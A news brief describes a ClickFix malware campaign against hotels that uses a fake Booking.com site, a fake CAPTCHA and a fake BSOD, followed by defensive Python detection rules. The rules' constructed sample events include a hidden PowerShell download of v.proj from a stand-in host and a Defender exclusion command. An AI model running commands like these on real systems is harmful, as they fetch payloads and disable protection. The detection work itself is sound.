Watch out for this fake Windows BSOD - it's actually malware
Briefly

"In a new malware campaign tracked by cybersecurity firm Securonix, attackers are using ClickFix social engineering, fake CAPTCHAs, and phony BSODs to convince victims into copying and pasting malicious code. Once executed, the code deploys a Russian-linked RAT (remote access trojan) that allows the criminals to remotely take over the PC and deploy additional malware. Aimed at the hotel and hospitality industry, the campaign dubbed PHALT#BLYX is described by Securonix as a multi-stage infection chain, as it takes its victims through a series of steps."
"The attack starts with a phishing email that contains a link to a fake website masquerading as online travel agency Booking.com. The email ostensibly includes a request to cancel a booking reservation to convince the recipient to engage with it. Selecting the link to the site displays a page with a fake CAPTCHA prompt that then triggers the phony BSOD. In this case, the recipient is told to fix the BSOD by copying and pasting a malicious script into the Windows run dialog box."
Attackers send phishing emails containing links to a fake Booking.com website that urges recipients to cancel a reservation. The fake site presents a CAPTCHA that triggers a faux Blue Screen of Death to alarm the user. The infection uses ClickFix social engineering to instruct victims to copy and paste a malicious script into the Windows Run dialog. The pasted script executes a PowerShell command that downloads an MSBuild project file named v.proj and disables Windows Defender. The payload is a Russian-linked remote access trojan that enables remote control, persistence, and deployment of additional malware. The campaign targets hotel and hospitality organizations.
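The chain summarized above leaves traces in process-creation logs that can be matched. The following is an added example, not code from Securonix or ZDNET: the rule names, regexes and sample events are constructed for illustration. It assumes `v.proj` is built by `MSBuild.exe` and that Defender is altered through the `Set-MpPreference` / `Add-MpPreference` cmdlets, neither of which the summary states.

```python
import re

# Heuristics for the chain summarized above. The patterns are assumptions
# chosen for illustration, not indicators published for this campaign.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
FETCH_OR_HIDE = re.compile(r"https?://|-w(indowstyle)?\s+h", re.I)
PROJECT_FILE = re.compile(r"[^\s\"']+\.\w*proj\b", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|downloads|users\\public)\\", re.I)
DEFENDER_TAMPER = re.compile(r"(Set|Add)-MpPreference\b.*-(Disable|Exclusion)\w+", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the rules a process-creation event matches."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event["command_line"]
    hits = []
    # Programs started from the Run dialog are children of explorer.exe.
    if image in SHELLS and parent == "explorer.exe" and FETCH_OR_HIDE.search(cmd):
        hits.append("run_dialog_shell")
    # MSBuild building a project from a user-writable directory is unusual
    # outside developer workstations.
    if image == "msbuild.exe" and any(
            USER_WRITABLE.search(p) for p in PROJECT_FILE.findall(cmd)):
        hits.append("msbuild_user_writable_project")
    if DEFENDER_TAMPER.search(cmd):
        hits.append("defender_tamper")
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
TMP = r"C:\Users\alice\AppData\Local\Temp\v.proj"
# Constructed records using Sysmon Event ID 1 style fields; not real telemetry.
SAMPLE_EVENTS = [
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -w hidden iwr https://example.invalid/v.proj -OutFile " + TMP},
    {"image": MSB, "parent_image": PS, "command_line": "MSBuild.exe " + TMP},
    {"image": PS, "parent_image": MSB,
     "command_line": r"powershell Add-MpPreference -ExclusionPath C:\ProgramData"},
    {"image": MSB, "parent_image": r"C:\VS\devenv.exe",
     "command_line": r"MSBuild.exe D:\src\app\app.csproj /t:Build"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(classify(e), e["command_line"])
```

The last sample event is a developer build from a source tree and matches no rule, which is the false-positive case the path check is there to avoid.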
Read at ZDNET